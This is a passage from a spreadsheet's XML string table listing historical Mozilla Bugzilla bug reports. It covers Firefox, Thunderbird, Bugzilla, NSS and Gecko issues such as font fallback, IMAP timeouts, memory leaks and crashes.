    <t>[Kurdish] Changing two keys/typos</t>
  </si>
  <si>
    <t>Created attachment 260867
Patch for one accesskey and one commandkey
This patch fixes two minor key issues:
1. Commandkey for open file should be o and not v because CTRL+v is paste
2. Accesskey for Cih Veke should be C and not W because W does not occur in the string</t>
  </si>
  <si>
    <t>BUGZILLA-39557</t>
  </si>
  <si>
    <t>doeditvotes.cgi needs to make sure bugs actually exist</t>
  </si>
  <si>
    <t>i managed to vote for a non-existant bug bug 40000 by editing a 
doeditvotes.cgi url.  the sanity check script didn't like that.</t>
  </si>
  <si>
    <t>BUGZILLA-277782</t>
  </si>
  <si>
    <t>_throw_error should unlock tables when tables are locked automatically</t>
  </si>
  <si>
    <t>When locking tables namedqueries READ and whine_queries READ are always
required due to Throw{Code|User}Error() (well... only if these subroutines are
called).
If this does not break anything I suggest that _throw_error always do a UNLOCK
TABLES instead of using the $unlock_tables variable. As this subroutine always
ends with an exit this sounds reasonable.
Note that MySQL does not complains if UNLOCK TABLES is used without a previous
LOCK TABLES.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-318635</t>
  </si>
  <si>
    <t>Update URL in Firefox-&gt;Product Site component's description to use mozilla.com</t>
  </si>
  <si>
    <t>I just happened to notice that the Product Site component in the Firefox product has a mozilla.org URL in the description. This should probably (?) be updated to go to http://www.mozilla.com/firefox/. Not really a big issue but just thought it should be updated since everything else is being changed over to the new site.
timeless says he wants an ok from some Firefox person before he will do it.</t>
  </si>
  <si>
    <t>FIREFOX-239929</t>
  </si>
  <si>
    <t>Semi-Single-Profile for firefox and the new-toolkit apps</t>
  </si>
  <si>
    <t>This is for the moment a tracker-bug for base work for the semi-single-profile
stuff for firefox. See attachment 144252 for an overview of the proposal.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-402541</t>
  </si>
  <si>
    <t>add CONFIG lines to tinder-config.pl's on release tag</t>
  </si>
  <si>
    <t>Created attachment 287408
add CONFIG lines
In order for release automation to work properly on trunk there needs to be CONFIG lines for some of the variables. This patch adds them.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-360034</t>
  </si>
  <si>
    <t>Version/config bumps for Fx/Tb 1509</t>
  </si>
  <si>
    <t>Tracking bug for version and configuration bumps for the Firefox 1.5.0.9 release.</t>
  </si>
  <si>
    <t>CORE-409089</t>
  </si>
  <si>
    <t>Dynamically adding text to -moz-grid doesn't make the text appear</t>
  </si>
  <si>
    <t>The testcase and reference have identical DOMs so they should look the same.
(This happens with both -moz-grid and -moz-grid-group.)</t>
  </si>
  <si>
    <t>CORE-494360</t>
  </si>
  <si>
    <t>[@font-face] font family names should hide platform fonts even when errors occur</t>
  </si>
  <si>
    <t>When an @font-face face fails to load for a font family that matches an existing platform font we load the platform font instead of falling back to the next font in the fallback list.
For example:
@font-face {
  font-family: Arial
  src: url(font.ttf)
}
body { font-family: Arial serif }
In this situation text on the page should *never* display with Arial it should either display with font.ttf or with a serif font.  The testcase URL includes @font-face rules with intentionally bad URL's so the text should appear using a serif face.
The root of the problem here is that the user font set lookup only returns yes/no for whether a font is loaded.  It should return not-found found-loaded and found-not-yet-loaded.  In the found-not-yet-loaded the font lookup should skip the platform font lookup.</t>
  </si>
  <si>
    <t>jd.bugzilla</t>
  </si>
  <si>
    <t>CORE-368138</t>
  </si>
  <si>
    <t>uneval of sharp variables has issues...</t>
  </si>
  <si>
    <t>from Bug 367686 and Bug 367731 
uneval of sharp variables has issues..
few examples...
uneval of
 function(){
   return [#1=(3)]
 }
gives ==&gt;
function () {
    return #1={}
}
uneval of 
function (){
  return [#1=({}) {__proto__: #1#}]
}
gives ==&gt;
function () {
    return #1={ {__proto__:#1#}}
}
uneval of 
function (){
  return [#1=x {__proto__: #1#}]
}
gives ==&gt;
function () {
    return #1={ {__proto__:#1#}}
}
But following unevals are fine
function (){
  return [1 #1=x {__proto__: #1#}]
}
and
function(){
   return [1 #1=(3)]
}</t>
  </si>
  <si>
    <t>THUNDERBIRD-519951</t>
  </si>
  <si>
    <t>Closing a contentTab leaks an nsBrowserStatusFilter and others</t>
  </si>
  <si>
    <t>Created attachment 404016
The fix
I saw this on the bloat boxes the other day when I'd temporarily let the what's new page check be broken and so it was actually being shown and causing a lot of leaks.
The issue is that we're setting up a c++ instance (the nsBrowserStatusFilter) with a listener (tabProgressListener) that is holding onto the tab object (mTab et al) which is then holding onto the c++ instance.
We need to break this cycle when we close the tab - so we save the listener and then remove it later.
I would also like to enable the content tab in the bloat tests but it appears when we switch/close the content tab back to the main 3 pane tab we're causing a bunch of other leaks - so I'll raise a bug on following that up as well and that can be the one to enable the content tab on the leak tests.</t>
  </si>
  <si>
    <t>BUGZILLA-410182</t>
  </si>
  <si>
    <t>Bugzilla crashes when moving a bug into another product when no QA contact is defined and strict_isolation is enabled</t>
  </si>
  <si>
    <t>Bugzilla crashes when moving a bug into another product when no QA contact is defined and strict_isolation is enabled:
Can't call method id on an undefined value at Bugzilla/Bug.pm line 1237:
sub _check_strict_isolation {
 ...
 $qa_contact = $invocant-&gt;qa_contact
   if $invocant-&gt;qa_contact-&gt;id != $original-&gt;qa_contact-&gt;id
$foo-&gt;qa_contact is undefined if there is no QA contact for the bug and so -&gt;id fails.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-267414</t>
  </si>
  <si>
    <t>provide more detailed unknown/untrusted secure certificate dialogues</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8a5) Gecko/20041031 Camino/0.8+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8a5) Gecko/20041031 Camino/0.8+
Camino provides rather uninformitive dialogues where security certificates are
other than normal--self-signed not matching the site one is visiting
etc.--in most cases not even telling the user what site the certificate claims
to be assigned to.
Reproducible: Always
Steps to Reproduce:
A. https://mail.yahoo.com
1. Log in to your Yahoo account and let it set a cookie.
2. Do not log out but leave the Yahoo network for a while.
3. Later (after a while Yahoo will require a login again) visit
https://mail.yahoo.com directly (Yahoo's logins default to non-secure versions).
4. Observe the warning dialogue
B. https://www.hilander.com/ssltest/ (mentioned in bug 170355)  
1. Visit the site directly
2. Observe warning dialogue
Actual Results:  
Dialogues don't provide much info about what the error might be what the
certificate claims to be vs. what the site is that user visiting etc.
See following attachments for these two sites as displayed in Camino Firefox
Safari.
Expected Results:  
More informative dialogues ability to inspect the certificates etc.  See
following attachments for these two sites as displayed in Camino Firefox
Safari.  The detail provided by Firefox would be wonderful but even the level
provided by Safari would be a slight but useful improvement.
To me this lack of detail seems to significantly impair the user's security
(and/or the user's ability to determine security) when visiting secure sites
that may be spoofed broken misconfigured etc.  
Thus I'm requesting major rather than enhancement or even normal.</t>
  </si>
  <si>
    <t>CORE-467417</t>
  </si>
  <si>
    <t>remove support for CFM plugins on Mac OS X</t>
  </si>
  <si>
    <t>We should remove support for CFM (Code Fragment Manager) plugins on Mac OS X. PPC NPAPI plugins on Mac OS X should be mach-o binaries. Plugin vendors were informed of this change in August of 2008. Barring any major complications this change should take effect in Gecko 1.9.2 (or whatever comes after 1.9.1).</t>
  </si>
  <si>
    <t>NSS-178490</t>
  </si>
  <si>
    <t>certutil -L -r backward compatibility tests (nightly QA) failing on all platforms</t>
  </si>
  <si>
    <t>Here are the errors from the nightly QA:
bct/diffie.1 Export the certificate as a DER (certutil -L -r) Failed
bct/diffie.2 Export the certificate as a DER (certutil -L -r) Failed
bct/haddock.1 Export the certificate as a DER (certutil -L -r) Failed
bct/haddock.2 Export the certificate as a DER (certutil -L -r) Failed
bct/hellman.1 Export the certificate as a DER (certutil -L -r) Failed
bct/hellman.2 Export the certificate as a DER (certutil -L -r) Failed
bct/shamir.1 Export the certificate as a DER (certutil -L -r) Failed
bct/shamir.2 Export the certificate as a DER (certutil -L -r) Failed
bct/spd04.1 Export the certificate as a DER (certutil -L -r) Failed
bct/spd04.2 Export the certificate as a DER (certutil -L -r) Failed
bct/spd04.3 Export the certificate as a DER (certutil -L -r) Failed
bct/spd04.4 Export the certificate as a DER (certutil -L -r) Failed
bct/spd09.1 Export the certificate as a DER (certutil -L -r) Failed
bct/spd09.2 Export the certificate as a DER (certutil -L -r) Failed
bct/vanity.1 Export the certificate as a DER (certutil -L -r) Failed
bct/vanity.2 Export the certificate as a DER (certutil -L -r) Failed 
Bob related to your Database 8 changes?</t>
  </si>
  <si>
    <t>bishakhabanerjee</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-409259</t>
  </si>
  <si>
    <t>Thunderbird timeouts of IMAP operations</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Build Identifier: 2.0.0.9 (20071031)
There is apparently an internal default timeout in Thunderbird for IMAP
operations - after 60 seconds if any particular IMAP operation has not
completed Thunderbird simply drops the IMAP connection re-opens
another one and immediately issues the same command again. This is very
bad behaviour on numerous counts. I'm not sure if the particular timeout
encountered here is listed on this site but it might be:
   http://kb.mozillazine.org/Modify_Thunderbird_settings
For example one customer of ours is testing deleting large numbers of messages.
Thunderbird by default does a message Delete by actually *copying* the
message to the Trash folder then setting the \Delete flag on the
messages in the original folder (for example the INBOX). In doing this
it is issuing IMAP copy instructions on a large range of messages in a
single operation. The IMAP protocol does not allow for any
processing... response (mid-transaction) in this only OK NO or BAD upon completion/termination of the operation.
If these operations take more than 60 seconds to complete Thunderbird simply
gives up and issues the same command again over and over. As the server
may not even now at this point that the connection is dropped it may
actually have multiple simultaneous COPY or APPEND operations initiated.
Following is an example from a CommuniGate Pro log for a copy of messages to the mailbox INBOX/TestMailbox notice the 1-minute intervals:
10:53:53.76 5 IMAP-45600([192.168.5.2]) inp: 25 uid copy 5708:14166
INBOX/TestMailbox
10:54:56.24 5 IMAP-45609([192.168.5.2]) inp: 7 uid copy 5708:14166
INBOX/TestMailbox
10:56:00.09 5 IMAP-45610([192.168.5.2]) inp: 7 uid copy 5708:14166
INBOX/TestMailbox
There are probably a few recommended behavioural changes here:
1. IMAP has no timeouts defined at all in the protocol:
     http://www.faqs.org/rfcs/rfc3501.html
It would probably be better/more correct to use timeouts only at the TCP
level and not at the IMAP application layer since there is no support in IMAP to notify either party (server/client) of timing.
2. If you really think that timeouts are needed the default ones should be
increased significantly (5 minutes or longer at a minimum). However logically there will always be some operation which could be issued which would exceed whatever timeout was set. IMAP COPY or APPEND operations can be very resource expensive and time consuming for obvious reasons. Modern mailboxes may be many GBs in size.
3. If a timeout is signaled the client should not simply issue the same
command again as it can only make server performance degrade in this scenario.
4. It might be better if Thunderbird performed a copy operation instead
on each message rather than on ranges of messages. This would increase
the number of transactions but would ensure that each operation was
acknowledged individually (and would allow Thunderbird to display to progression of messages being moved to the destination mailbox).
Reproducible: Always
Steps to Reproduce:
1. Create a very large mailbox - one in which performing an IMAP COPY or APPEND will take longer than 60 seconds on the server to complete.
2. Copy the messages in this mailbox to another mailbox (or alternately just use the Thunderbird Delete operation which by default copies the messages to the Trash mailbox).
3. In most cases the operation will never complete or Thunderbird will lock-up/freeze.
Actual Results:  
Operation never completes successfully and the command may be automatically repeated indefinitely by Thunderbird (thereby potentially greatly increasing the load on the IMAP server).
Expected Results:  
The IMAP COPY or APPEND should complete eventually.
This bug is probably related to many others I found in the database though none exactly laying out the underlying problem which is that the IMAP protocol does not provide for timeouts or mid-transaction dialog. Therefore these timeouts should probably be removed from Thunderbird. Here are some other bugs likely related:
https://bugzilla.mozilla.org/show_bug.cgi?id=406929
https://bugzilla.mozilla.org/show_bug.cgi?id=327312
https://bugzilla.mozilla.org/show_bug.cgi?id=325063
https://bugzilla.mozilla.org/show_bug.cgi?id=390257
Another optimization that could be made in this area though with more discussion really needed because of the change in behaviour is that the Trash mailbox should really be a virtual mailbox listing all of those messages marked \Delete without actually having to perform an IMAP COPY operation to a real mailbox called Trash. This is highly inefficient as a default behaviour. (Note: some users may prefer to have an actual Trash mailbox as a storage space so this behaviour could be retained as an option.)
Thank you very much. Please feel free to let me know if you have any questions or need more information.</t>
  </si>
  <si>
    <t>thom</t>
  </si>
  <si>
    <t>CORE-248458</t>
  </si>
  <si>
    <t>Crash [@ nsJSIID::Equals] for null other</t>
  </si>
  <si>
    <t>steps to reproduce:
1. run xpcshell
2.
js&gt; Components.interfaces.nsISupports.equals(null)
Expected result:
 false or an exception
Actual result:
crash
&gt;	xpc3250.dll!nsJSIID::Equals(nsIJSID * other=0x00000000 int *
_retval=0x0012e864)  Line 439 + 0x3	C++
 	xpcom.dll!XPTC_InvokeByIndex(nsISupports * that=0x00f4b0c8 unsigned int
methodIndex=0x00000007 unsigned int paramCount=0x00000002 nsXPTCVariant *
params=0x0012e854)  Line 102	C++
 	xpc3250.dll!XPCWrappedNative::CallMethod(XPCCallContext &amp; ccx={...}
XPCWrappedNative::CallMode mode=CALL_METHOD)  Line 2028 + 0x16	C++
Reproduced w/ trunk.</t>
  </si>
  <si>
    <t>CORE-200204</t>
  </si>
  <si>
    <t>Timeline service should expose NS_TIMELINE_MARK_TIMER1</t>
  </si>
  <si>
    <t>The timeline service supports writing an additional string with a timer result
exposed for C++ via NS_TIMELINE_MARK_TIMER1()
The XPCOM |nsITimelineService| interface supports only |markTimer| offering
only NS_TIMELINE_MARK_TIMER functionality.  Thus non non C++ components have no
access to this feature.
Attaching a patch with this functionality.  The service gets a new method
|markTimer1| which is the same as |markTimer| but takes the additional arg.</t>
  </si>
  <si>
    <t>markh</t>
  </si>
  <si>
    <t>FIREFOX-214528</t>
  </si>
  <si>
    <t>Search Bar UI</t>
  </si>
  <si>
    <t>Search Bar in new profiles defaults to find in page - should default to Google
search. Also add a keybinding to pop open the engine switcher e.g. Ctrl+Down
Arrow.</t>
  </si>
  <si>
    <t>CORE-416762</t>
  </si>
  <si>
    <t>OBJECTBOUNDINGBOX units should include a translation by the boundingbox origin</t>
  </si>
  <si>
    <t>In two places we use nsSVGUtils::ObjectSpace to interpret x/y/width/height coordinates according to objectBoundingBox units without using the bounding-box origin as a translation:
Patterns:
http://mxr.mozilla.org/seamonkey/source/layout/svg/base/src/nsSVGPatternFrame.cpp#643
Filter primitive subregions:
http://mxr.mozilla.org/seamonkey/source/layout/svg/base/src/nsSVGFilterFrame.cpp#451
These are both bugs right? The spec says
http://www.w3.org/TR/SVG/coords.html#ObjectBoundingBox
&gt; Then coordinate (00) in the new user coordinate system is mapped to the
&gt; (minxminy) corner of the tight bounding box within the user coordinate system
&gt; of the applicable element
which is of course what authors would expect too.</t>
  </si>
  <si>
    <t>CORE-178045</t>
  </si>
  <si>
    <t>floating point error when using gtk2 on startup</t>
  </si>
  <si>
    <t>From bug #176842:
------- Additional Comment #11 From Geoff Leach 2002-11-01 21:55 -------
With this patch (from CVS checkout based build) I get
###!!! ASSERTION: Computed Size =0 &amp;&amp;
aReflowState.mComputedHeight &gt;= 0' file nsBoxFrame.cpp line 803
Break: at file nsBoxFrame.cpp line 803
/home/gl/mozilla/dist/bin/run-mozilla.sh: line 444:  1147 Floating point
exception$prog ${1+$@}
When I back the patch out  the above does not occur.
.mozconfig
ac_add_options --enable-svg
ac_add_options --enable-crypto
ac_add_options --enable-default-toolkit=gtk2
ac_add_options --disable-toolkit-gtk
ac_add_options --disable-toolkit-qt
ac_add_options --enable-xft
ac_add_options --enable-freetype2
ac_add_options --enable-cpp-rtti
ac_add_options --enable-cpp-exceptions
ac_add_options --enable-extensions
ac_add_options --with-system-jpeg
ac_add_options --with-system-zlib
ac_add_options --with-system-png
ac_add_options --with-system-mng
#ac_add_options --enable-calendar
MOZ_INTERNAL_LIBART_LGPL=1
mk_add_options MOZ_INTERNAL_LIBART_LGPL=1
#MOZ_CALENDAR=1
#mk_add_options MOZ_CALENDAR=1</t>
  </si>
  <si>
    <t>CORE-180380</t>
  </si>
  <si>
    <t>nsXPCComponents object and its wrapper leaked at shutdown</t>
  </si>
  <si>
    <t>This problem has been bugging me for a while:
On shutdown we leak an nsXPCComponents object and its wrapper along with a ton
of associated JS objects that aren't GCed because these objects exist.  This is
essentially an instance of the shutdown ordering problem described at:
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/js/src/xpconnect/src/nsXPConnect.cpp&amp;rev=1.62&amp;mark=109-112130-141#107
However I've been wondering if we need a fully constructed components object on
the JS context owned by the XPCCallContext just in order to to call
JS_SetPrivate in XPCWrappedNative::SystemIsBeingShutDown and in
XPCWrappedNativeProto::SystemIsBeingShutDown.
I have a patch that's a bit of a hack that fixes this leak using this approach.
 It's not ready to be checked in because I did a few evil things in it. 
However I'd be interested to hear if people think the approach is reasonable.</t>
  </si>
  <si>
    <t>CORE-520822</t>
  </si>
  <si>
    <t>IPC</t>
  </si>
  <si>
    <t>iframe doesn't get redrawn when *reducing* main window's size</t>
  </si>
  <si>
    <t>When decreasing the main e10s window's width by dragging the right window border left the inner iframe content doesn't get reflowed (see the attached video). However increasing the window size does trigger effective reflow of the iframe.
Only tried on Win32 atm. Might not be the case on linux.</t>
  </si>
  <si>
    <t>frederic.plourde</t>
  </si>
  <si>
    <t>FIREFOX-257608</t>
  </si>
  <si>
    <t>[altss] port alternate stylesheet fixes from Aviary Branch to Trunk</t>
  </si>
  <si>
    <t>port Altss fixes from Aviary Branch to Trunk</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-233169</t>
  </si>
  <si>
    <t>It's impossible to set helper applications for executables</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 de-AT rv:1.6) Gecko/20040113
Mozilla doesn't launch helper applications if they are defined for executable
files in the latest builds (it was possible in older versions without problems).
I use an helper application to prevent an not very experienced user from
executing (and saving!) applications by setting an helper application for
executable files that simply displays a dialog you are not allowed to do this
adds the file to a logfile and kills it. Then I've setted editable to false
for this dangerous mime-types in mimeTypes.rdf. This successfully protected
this user from executing any malware so far. No this save dialog reduces the
security in this scenario since this user is now able to save the file to
somewhere and open it.
Another useful application area for helper applications for executable files
would be an script that automatically passes the file to an virus scanner and
then decides if this file gets saved to the download-directory or if the file
gets deleted.
I've found out that this is caused by an patch for fixing the following bug:
http://bugzilla.mozilla.org/show_bug.cgi?id=68279
I completely agree that it's needed to block the automatich Execution of
executables from mozilla (disabling Use default action for this type of file)
but I don't agree that it's needed to make it impossible to set helper
applications for them. If you don't want to make it possible to set helper
applications for executables per default then I think there should be at least
an hidden setting to make it possible to enable this via user.js.
Reproducible: Always
Steps to Reproduce:
1. Set an new helper application for application/octet-stream (for example
open with notepad.exe)
2. Add an .exe-file of your choice to an compose-mail window and choose Send
Later from the file menu
2. Go to your unsend messages open the unsend mail and doubleclick the
attachment.
Actual Results:  
I get the save file dialog even if I've setted an helper application for this
mime-type.
Expected Results:  
Mozilla should have executed the helper application.</t>
  </si>
  <si>
    <t>Manuel.Spam</t>
  </si>
  <si>
    <t>CALENDAR-388926</t>
  </si>
  <si>
    <t>Use  If-Modified-Since when checking for updates in ICS calendars</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-GB rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
Build Identifier: 
Many ICS calendars are available on the Web mostly read-only.
HTTP Last-Modified is typically set when these are downloaded.
It would save some time and bandwidth if Sunbird used HTTP GET
If-Modified-Since when refreshing or checking these unless cache control
or expires headers on the server prohibit it.
Reproducible: Always
Steps to Reproduce:
1. Sunbird issues GET to refresh an existing calendar.
Actual Results:  
2. Server responds with entire ICS calendar even if it has not changed.
Expected Results:  
1. Sunbird issues GET with If-Modified-Since header cached from last download 
2. Server responds with status 304 Not Modified if the calendar is unchanged</t>
  </si>
  <si>
    <t>advax</t>
  </si>
  <si>
    <t>SEAMONKEY-451722</t>
  </si>
  <si>
    <t xml:space="preserve">Modern theme support for </t>
  </si>
  <si>
    <t>This new binding is already used in the Extension Manager for instance.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-813653</t>
  </si>
  <si>
    <t>servo@mozilla.com membership for Felix Klock</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #723771 +++
Tim Chevalier (fklock@mozilla.com) is a member of the research group and needs to be added to the servo@mozilla.com distribution list.
Thanks
Dave</t>
  </si>
  <si>
    <t>david.herman</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-210925</t>
  </si>
  <si>
    <t>Java: OJI</t>
  </si>
  <si>
    <t>Java plug-in crashes browser after logging in to 1822direkt.com</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4b) Gecko/20030507
Build Identifier: Mozilla/5.0 from CVS built on 2003-06-23
After having logged in at https://www.1822direkt.com/  the browser crashes.
Other applet run flawless.
Java version:
java version 1.4.2
Java(TM) 2 Runtime Environment Standard Edition (build 1.4.2-b28)
Java HotSpot(TM) Client VM (build 1.4.2-b28 mixed mode)
Using /usr/java/j2sdk1.4.2/jre/plugin/i386/ns610-gcc32/libjavaplugin_oji.so
JRE 1.4.1_01-b01 doesn't have this problem.
The same problem occurs with Mozilla 1.3.
Reproducible: Always
Steps to Reproduce:
(you need an account at 1822direkt.com for this the demo account doesn't show
this problem)
1. https://www.1822direkt.com/onlineb.window_follow.html
2. Move the mouse until the login screen is shown
3. enter customer id and PID
4. press enter
Actual Results:  
The browser crashes
Expected Results:  
no crash the usual bank account management dialog is shown
The Java Console shows:
Using www.1822direkt.com
&gt;direkt1822.ib100.Registrate&lt; loaded.
&gt;direkt1822.ib100.AccountOverview&lt; loaded.
&gt;direkt1822.ib100.Feedback&lt; loaded.
&gt;direkt1822.ib100.AccountOrders&lt; loaded.
&gt;direkt1822.ib100.TurnOver&lt; loaded.
&gt;direkt1822.ib100.PinTanAdmin&lt; loaded.
&gt;direkt1822.ib100.Depot&lt; loaded.
&gt;direkt1822.ib100.Transfer&lt; loaded.
&gt;direkt1822.ib100.StockTrade&lt; loaded.
&gt;direkt1822.ib100.DirectTrade&lt; loaded.
&gt;direkt1822.ib100.Subscription&lt; loaded.
&gt;direkt1822.ib100.ForeignExchange&lt; loaded.
&gt;direkt1822.ib100.StandingOrders&lt; loaded.
&gt;direkt1822.ib100.StOrderEdit&lt; loaded.
&gt;direkt1822.ib100.OrderSearch&lt; loaded.
&gt;direkt1822.ib100.Randomizer&lt; loaded.
&gt;direkt1822.ib100.Invest&lt; loaded.
&gt;direkt1822.ib100.Note&lt; loaded.
&gt;direkt1822.ib100.WPOrderSearch&lt; loaded.
All classes are loaded.</t>
  </si>
  <si>
    <t>mozilla-06</t>
  </si>
  <si>
    <t>CORE-77063</t>
  </si>
  <si>
    <t>excessive nsAutoString construction in SelectorMatches</t>
  </si>
  <si>
    <t>I just profiled new window performance and nsAutoString construction showed up
as a significant part of SelectorMatches performance (which isn't that much for
new window time).  Anyway Daniel doubled the number of nsAutoStrings (which
have very slow constructors for probably not very good reasons) in one of his
recent patches.  I'll attach a patch that removes the extra nsAutoString and
also switches to using the new string code for attribute begins/ends selectors
and thus avoiding a string copy.  It makes the further optimization (which it
must now due to an unsigned int parameter) of checking the lengths and bailing
if the attribute is shorter than the selector's string.
This uses the case-insensitive string comparison that scc added a few days ago.
I ran the relevant parts of Daniel's CSS3 selectors tests and things seemed fine.</t>
  </si>
  <si>
    <t>SEAMONKEY-198280</t>
  </si>
  <si>
    <t>Inconsistent text color for descriptive text in Junk Mail Control window  prefs and account settings.</t>
  </si>
  <si>
    <t>Using trunk builds 20030318 on winxp macosx and linux we've added a Junk Mail
Control window with options.  The option to Automatically delete messages that
are older than [14] days from this folder should only grey out the data entry
box ([14]) when disabled not the text after it.  
Currenty we have 5 places where this type of option is displayed 2 of them grey
the text after this data entry box and 3 of them  don't.  
We need them all to do the same thing which I believe is to leave all of the
text black. 
Cases where only the first part of the descriptive text is black the other part
is grey when option is disabled:
1.) Junk Mail Controls- Automatically delete messages that are older than [14]
days from this folder
2.) Mail Account Settings- Server Settings Check for new messages every [10]
minutes
Cases where all of the descriptive text is Black in the disabled state.
1.)Preferences- Offline and Disk Space - Disk Space section
2.)Preferences- Privacy &amp; Security Master Password 3rd radio button for Master
Password Time out 
3.)Preferences- Advanced Mouse Wheel - 1st radio button.</t>
  </si>
  <si>
    <t>esther</t>
  </si>
  <si>
    <t>TOOLKIT-307047</t>
  </si>
  <si>
    <t>stackTraceFunctionFormat(aFunctionName)  as typo  error</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 es-ES rv:1.7.8) Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-1)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 es-ES rv:1.7.8) Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-1)
I am running firefox with debugger mode set to pedantic. Theres a few errors on
firefox itself I guest can generate other errors.
On stackTraceFunctionFormat(aFunctionName)
The code:
  if (!functionName) 
    functionName == 
sould be:
  if (!functionName) 
    functionName = 
My version is:
Mozilla/5.0 (X11 U Linux i686 es-ES rv:1.7.8) Gecko/20050517 Firefox/1.0.4
(Debian package 1.0.4-1)
Reproducible: Always
Steps to Reproduce:
1. activate debugging
2. look at javascript console
3. Profit!
Actual Results:  
Info on log appear:
-----
Advertencia: useless expression
Archivo de origen: file:///usr/lib/mozilla-firefox/components/nsExtensionManager.js
LÃ­nea: 337
Expected Results:  
Zero boogs!</t>
  </si>
  <si>
    <t>oscar.vives</t>
  </si>
  <si>
    <t>CORE-478534</t>
  </si>
  <si>
    <t>TM: about:config filter shows bad results with jit.content=true</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2a1pre) Gecko/20090213 Minefield/3.2a1pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2a1pre) Gecko/20090213 Minefield/3.2a1pre
when i applied  filter in 'about:config' extra(unnecessary) results are shown.
Reproducible: Always
Steps to Reproduce:
1.load about:config
2.type 'jit' in the filter bar
Actual Results:  
extra(unnecessary) results are shown.
browser.cache.disk.capacity
browser.cache.offline.capacity
font.name-list.serif.x-geor
javascript.options.jit.chrome
javascript.options.jit.content
toolkit.autocomplete.richBoundaryCutoff
toolkit.scrollbox.clickToScroll.scrollDelay
toolkit.scrollbox.scrollIncrement
toolkit.scrollbox.smoothScroll
toolkit.zoomManager.zoomValues
Expected Results:  
should be shown these results only.
javascript.options.jit.chrome
javascript.options.jit.content
OK:
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2a1pre) Gecko/20090210 Minefield/3.2a1pre
bad:
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2a1pre) Gecko/20090211 Minefield/3.2a1pre</t>
  </si>
  <si>
    <t>himarm</t>
  </si>
  <si>
    <t>CORE-221186</t>
  </si>
  <si>
    <t>xbl binding is no longer installed when xpconnect wrapper is created</t>
  </si>
  <si>
    <t>There's code in nsElementSH::PostCreate which is supposed to ensure that a
binding is loaded prior to handing back a JS reference to the element.  It was
broken by the checkin for bug 113173.</t>
  </si>
  <si>
    <t>CORE-379683</t>
  </si>
  <si>
    <t>[FIX]Simplify the DOM the prettyprinter produces</t>
  </si>
  <si>
    <t>Created attachment 263692
Proposed fix
Patch coming up now with the power of inline-block.  With this patch the testcase in bug 291643 uses about 80MB less memory (240MB instead of 320MB) and loads about twice as fast.
The basic change is to nix the tables so that instead of doing:
    -
         Stuff
with indents of kids of expander-content handled via margins on the kids we now do:
  -
    Stuff
with indents of kids done via padding on expander-content.  We have to toss in a 1em margin on the toplevel thing but that's ok.
The other important change is to replace all the  stuff with plaintext.  We don't style it anyway.  )</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-316895</t>
  </si>
  <si>
    <t>copy element needs to cause rebuilds</t>
  </si>
  <si>
    <t>As per 9.3.4 in the spec (http://www.w3.org/TR/2005/PER-xforms-20051006/index-all.html#ui-adv-copy) copy needs to cause a A full computational dependency rebuild when a copyItem is selected or deselected.  It doesn't say that this holds off if @incremental=false but I assume that it should.  What do you think Allan?</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-207600</t>
  </si>
  <si>
    <t>Tech Evangelism New Components</t>
  </si>
  <si>
    <t>We are reorganizing the Tech Evangelism components. It will proceed in three phases:
1. create new components
2. move existing bugs
3. remove obsolete components
This bug concerns phase 1.
All new components will use aliases for their default owners and qa assignments.
Anyone wishing to be involved in Tech Evangelism will simply need to watch the
appropriate email aliases.
New Components  - New Owner/QA
 Arabic - arabic@evangelism.bugs
   Evangelism bugs for sites in Arabic languages
 Chinese - chinese@evangelism.bugs
   Evangelism bugs for sites in Chinese
 Czech - czech@evangelism.bugs
   Evangelism bugs for sites in Czech
 Dutch - dutch@evangelism.bugs
   Evangelism bugs for sites in Dutch
 English Other - english-other@evangelism.bugs
   Evangelism bugs for sites in English which are not located in the United States
 English US - english-us@evangelism.bugs
   Evangelism bugs for sites in English which are located in the United States
 French - french@evangelism.bugs
   Evangelism bugs for sites in French
 German - german@evangelism.bugs
   Evangelism bugs for sites in German
 Hebrew - hebrew@evangelism.bugs
   Evangelism bugs for sites in Hebrew
 Italian - italian@evangelism.bugs
   Evangelism bugs for sites in Italian
 Norwegian - norwegian@evangelism.bugs
    Evangelism bugs for sites in Norwegian
 Other - other@evangelism.bugs
    Evangelism bugs for sites in languages not listed as a Component
 Polish - polish@evangelism.bugs
    Evangelism bugs for sites in Polish
 Portuguese - portuguese@evangelism.bugs
    Evangelism bugs for sites in Portuguese
 Spanish - spanish@evangelism.bugs
    Evangelism bugs for sites in Spanish</t>
  </si>
  <si>
    <t>CORE-526756</t>
  </si>
  <si>
    <t>Check .mv entry in Public Suffix List</t>
  </si>
